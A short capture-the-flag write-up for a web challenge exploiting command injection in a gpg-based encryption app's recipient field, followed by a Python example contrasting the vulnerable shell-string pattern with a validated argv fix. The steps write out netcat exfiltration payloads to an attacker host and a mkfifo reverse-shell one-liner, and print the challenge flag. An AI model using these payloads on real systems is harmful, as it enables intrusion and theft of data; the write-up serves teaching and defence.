After exploring their internal network, we have found another encryption tool. Can you hack the server and extract confidential data? Our intel tells us that the application uses the gpg tool.
Category: Web || Level: Medium
Upload a .txt file
Open Burp
Enable intercept
Click Encrypt & Download
In Burp: send the request to Repeater
*Edit the recipient field of the request
1. After the semicolon (;), append $(ls | nc <IP_ATTACKER> <PORT>)
2. Start a listener on the host machine, then send the request from Burp
Once that succeeds:
3. OPTIONAL: change it to: $(cat flag.txt | nc <IP_ATTACKER> <PORT>)
4. ALTERNATIVE: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP_ATTACKER> <PORT> >/tmp/f
Output (the decrypted message):
THM{going_in_bl1nd_2394}
Because I did not have time to take screenshots, I am only giving the solution steps I used.
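
The root cause behind the steps above, with the fix next to it, as an added example (this is not the challenge application's code, which the write-up does not show). It assumes a Python backend that interpolated the recipient into a shell command line; the names vulnerable_command, is_valid_recipient, build_gpg_argv, encrypt and RECIPIENT_RE are hypothetical, and the sample payload is constructed with a documentation IP address.

```python
import re
import subprocess

# Assumption: a recipient is an e-mail address or a hex key ID / fingerprint.
RECIPIENT_RE = re.compile(
    r"(?:[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}|(?:0x)?[0-9A-Fa-f]{8,40})"
)

# Constructed sample in the shape used in the steps above.
SAMPLE_PAYLOAD = "user@example.com;$(ls | nc 192.0.2.10 4444)"


def vulnerable_command(recipient: str, in_path: str) -> str:
    """Assumed vulnerable pattern: one string later handed to a shell.

    The shell interprets ';' and '$(...)' inside `recipient` before gpg
    ever sees it, which is why the request edit in Repeater works blind.
    """
    return f"gpg --encrypt --recipient {recipient} {in_path}"


def is_valid_recipient(recipient: str) -> bool:
    # fullmatch: the entire value must fit the allow-list, not just a prefix.
    return RECIPIENT_RE.fullmatch(recipient) is not None


def build_gpg_argv(recipient: str, in_path: str, out_path: str) -> list[str]:
    """Hardened form: validated recipient, argv list, no shell involved."""
    if not is_valid_recipient(recipient):
        raise ValueError("recipient rejected")
    return [
        "gpg", "--batch", "--yes",
        "--output", out_path,
        "--encrypt", "--recipient", recipient,
        "--", in_path,  # '--' ends option parsing before the file name
    ]


def encrypt(recipient: str, in_path: str, out_path: str) -> None:
    # shell=False (the default) passes each element to gpg as one argument,
    # so metacharacters in any element are never expanded.
    subprocess.run(build_gpg_argv(recipient, in_path, out_path), check=True)
```

The server-side paths passed as in_path and out_path should be generated by the application rather than taken from the uploaded file's name.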